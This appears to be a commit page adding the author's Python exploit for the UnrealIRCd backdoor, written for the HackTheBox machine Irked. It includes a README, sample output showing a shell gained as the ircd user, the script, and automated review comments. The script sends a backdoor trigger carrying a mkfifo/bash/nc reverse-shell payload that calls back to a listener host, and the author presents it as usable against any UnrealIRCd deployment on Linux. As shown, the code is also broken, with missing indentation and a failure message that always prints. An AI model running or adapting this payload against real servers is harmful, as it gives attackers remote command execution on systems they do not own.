Commit 3f2fe8b8 authored by 0xdf

added unrealirc exploit

parent daf7a2e8
## Description
I recently ran into the need to exploit an [UnrealIRCd server]( Version contains a backdoor which can provide RCE. There's already a [Metasploit exploit module]( for the vulnerability, but I didn't really love the scripts I found out there for it. So I wrote my own.
While I developed this script for [Irked from HackTheBox](, it should be generic to any UnrealIRCd deployment on Linux, provided that a mkfifo reverse shell works on the target.
## Usage
Call the python script with four arguments to identify the target ip and port, and the callback ip and port you want to use. Then, wait and get a shell:
root@kali# ./ 6697 443
[*] Connecting to
[*] Sending payload
[+] Payload sent. Closing socket.
[*] Opening listener. Callback should come within a minute
bash: cannot set terminal process group (634): Inappropriate ioctl for device
bash: no job control in this shell
ircd@irked:~/Unreal3.2$ id
uid=1001(ircd) gid=1001(ircd) groups=1001(ircd)
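Review bot: The Description never names the affected release ("Version contains a backdoor" has no version number) and all three link targets are empty, so a reader cannot tell which UnrealIRCd deployments the script applies to; fill in the version and the URLs. In Usage, the text says four arguments are required but the sample command shows only "6697 443" with no script name or addresses, and the "[*] Connecting to" output line has no host; show the full invocation with placeholder addresses. The README should also state that the payload creates the FIFO /tmp/f on the target and that nothing in the script removes it afterwards.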
#!/usr/bin/env python3
import socket
import subprocess
import sys
if len(sys.argv) != 5:
print(f"Usage: {sys.argv[0]} [target_ip] [target_port] [callback ip] [callback port]")
rhost, rport, lhost, lport = sys.argv[1:]
print(f"[*] Connecting to {rhost}:{rport}")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((rhost, int(rport)))
print(f"[-] Failed to connect to {rhost}:{rport}")
print("[*] Sending payload")
s.send(f"AB; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc {lhost} {lport} >/tmp/f\n".encode())
print("[+] Payload sent. Closing socket.")
print("[*] Opening listener. Callback should come within a minute")
ncsh = subprocess.Popen(f"nc -nl {lhost} {lport}", shell=True)
print("\n[!] Exiting shell")
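Review bot: The error paths do not stop the script as shown. The line after `if len(sys.argv) != 5:` is not indented and nothing exits after the usage message, so with the wrong argument count the unpacking of `sys.argv[1:]` would raise ValueError. The "[-] Failed to connect" print follows `s.connect(...)` with no try/except, so it runs even when the connection succeeds. Add `sys.exit(1)` after the usage message and wrap the connect in `try` / `except OSError` with an exit in the handler. The script prints "Closing socket" but never calls `s.close()`, and the `ncsh` handle from Popen is never waited on, so add `s.close()` and `ncsh.wait()`. For the listener, pass an argument list such as `["nc", "-nl", lhost, lport]` instead of an f-string with `shell=True`, so the command-line values are not re-parsed by the local shell. Checking `lhost` with the `ipaddress` module and `lport` as an integer before they are formatted into any string would catch typos early.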